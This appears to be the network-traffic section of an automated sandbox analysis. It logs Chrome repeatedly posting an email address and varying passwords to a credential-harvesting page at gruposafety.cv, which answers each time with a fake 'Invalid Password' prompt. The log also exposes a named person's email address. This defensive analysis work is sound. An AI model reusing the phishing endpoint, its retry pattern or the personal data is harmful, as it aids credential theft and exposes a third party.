                            Jan 1, 2025 22:53:37.002760887 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.664237022 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.664551020 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.664580107 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.665600061 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.665664911 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.665942907 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.665999889 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.666110992 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.666117907 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.674623966 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.677112103 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.677138090 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.677510023 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.683279037 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.683356047 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:37.719255924 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:37.735140085 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:38.140933037 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:38.141014099 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:38.141081095 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:38.150607109 CET50034443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:38.150629044 CET44350034130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:47.883205891 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:47.888856888 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:47.888923883 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:47.888968945 CET44350033130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:47.889051914 CET50033443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.780474901 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.780536890 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:59.780621052 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.780658007 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.780688047 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:59.780730963 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.781465054 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.781480074 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:53:59.781599998 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:53:59.781625032 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.464544058 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.510211945 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.542057037 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.570651054 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.570671082 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.570991039 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.571032047 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.571429968 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.572233915 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.572292089 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.572802067 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.572886944 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.573105097 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.573172092 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.577841043 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.615544081 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:00.615566015 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.623337030 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:00.665693045 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:01.105732918 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:01.105824947 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:01.105882883 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:01.106854916 CET50035443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:01.106888056 CET44350035130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:09.211014986 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:09.211056948 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.211116076 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:09.211344004 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:09.211360931 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.837970018 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.838315964 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:09.838335037 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.838624954 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.838915110 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:09.838973999 CET44350037142.250.185.196192.168.2.4
                            Jan 1, 2025 22:54:09.892833948 CET50037443192.168.2.4142.250.185.196
                            Jan 1, 2025 22:54:11.729409933 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:11.754920006 CET50036443192.168.2.4130.185.81.111
                            Jan 1, 2025 22:54:11.754962921 CET44350036130.185.81.111192.168.2.4
                            Jan 1, 2025 22:54:11.755016088 CET50036443192.168.2.4130.185.81.111
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 1, 2025 22:51:04.554938078 CET53522161.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:04.556901932 CET53573541.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:06.092573881 CET53629181.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:09.031893015 CET5622053192.168.2.41.1.1.1
                            Jan 1, 2025 22:51:09.031996965 CET5624853192.168.2.41.1.1.1
                            Jan 1, 2025 22:51:09.038789034 CET53562481.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:09.039046049 CET53562201.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:16.945698023 CET53548251.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:20.535799026 CET6385153192.168.2.41.1.1.1
                            Jan 1, 2025 22:51:20.535948992 CET6538753192.168.2.41.1.1.1
                            Jan 1, 2025 22:51:20.580409050 CET53653871.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:20.582035065 CET53638511.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:22.992121935 CET53556341.1.1.1192.168.2.4
                            Jan 1, 2025 22:51:23.463665962 CET138138192.168.2.4192.168.2.255
                            Jan 1, 2025 22:51:41.757359982 CET53510891.1.1.1192.168.2.4
                            Jan 1, 2025 22:52:04.338455915 CET53580081.1.1.1192.168.2.4
                            Jan 1, 2025 22:52:04.383620024 CET53545401.1.1.1192.168.2.4
                            Jan 1, 2025 22:52:35.038840055 CET53624341.1.1.1192.168.2.4
                            Jan 1, 2025 22:53:19.806345940 CET53543671.1.1.1192.168.2.4
                            Jan 1, 2025 22:54:09.203423977 CET5098153192.168.2.41.1.1.1
                            Jan 1, 2025 22:54:09.203612089 CET6179153192.168.2.41.1.1.1
                            Jan 1, 2025 22:54:09.210258961 CET53617911.1.1.1192.168.2.4
                            Jan 1, 2025 22:54:09.210385084 CET53509811.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 1, 2025 22:51:09.031893015 CET192.168.2.41.1.1.10xc727Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jan 1, 2025 22:51:09.031996965 CET192.168.2.41.1.1.10x9829Standard query (0)www.google.com65IN (0x0001)false
                            Jan 1, 2025 22:51:20.535799026 CET192.168.2.41.1.1.10xf7d6Standard query (0)gruposafety.cvA (IP address)IN (0x0001)false
                            Jan 1, 2025 22:51:20.535948992 CET192.168.2.41.1.1.10x9601Standard query (0)gruposafety.cv65IN (0x0001)false
                            Jan 1, 2025 22:54:09.203423977 CET192.168.2.41.1.1.10x8c0aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jan 1, 2025 22:54:09.203612089 CET192.168.2.41.1.1.10x4d71Standard query (0)www.google.com65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 1, 2025 22:51:09.038789034 CET1.1.1.1192.168.2.40x9829No error (0)www.google.com65IN (0x0001)false
                            Jan 1, 2025 22:51:09.039046049 CET1.1.1.1192.168.2.40xc727No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                            Jan 1, 2025 22:51:20.582035065 CET1.1.1.1192.168.2.40xf7d6No error (0)gruposafety.cv130.185.81.111A (IP address)IN (0x0001)false
                            Jan 1, 2025 22:54:09.210258961 CET1.1.1.1192.168.2.40x4d71No error (0)www.google.com65IN (0x0001)false
                            Jan 1, 2025 22:54:09.210385084 CET1.1.1.1192.168.2.40x8c0aNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                            • gruposafety.cv
                            • https:
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449752130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:51:21 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 60
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:51:21 UTC60OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 6e 70 31 4d 62 78 4b 44 77 30 62 64 32
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=np1MbxKDw0bd2
                            2025-01-01 21:51:21 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:50:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:51:21 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449751130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:51:32 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449756130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:51:45 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 64
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:51:45 UTC64OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 77 25 32 36 6d 73 4f 63 38 4d 45 38 70 41 25 37 43
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=w%26msOc8ME8pA%7C
                            2025-01-01 21:51:45 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:50:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:51:45 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449755130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:51:55 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.449832130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:52:11 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 63
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:52:11 UTC63OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 25 33 43 7a 32 36 48 42 66 69 25 37 44 79 6f 76
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=%3Cz26HBfi%7Dyov
                            2025-01-01 21:52:11 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:50:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:52:11 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449831130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:52:21 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.450000130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:52:37 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 74
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:52:37 UTC74OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 65 4f 25 35 44 5a 57 69 4a 4d 25 34 30 78 25 32 31 25 32 42 41 65 61 25 37 42 45
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=eO%5DZWiJM%40x%21%2BAea%7BE
                            2025-01-01 21:52:37 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:51:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:52:37 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.450001130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:52:48 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.450030130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:53:04 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 70
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:53:04 UTC70OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 46 25 33 41 25 35 45 6e 66 44 25 32 33 37 25 35 42 4e 59 31 2a 49 74
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=F%3A%5EnfD%237%5BNY1*It
                            2025-01-01 21:53:04 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:51:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:53:04 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.450031130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:53:15 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.450034130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:53:37 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 65
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
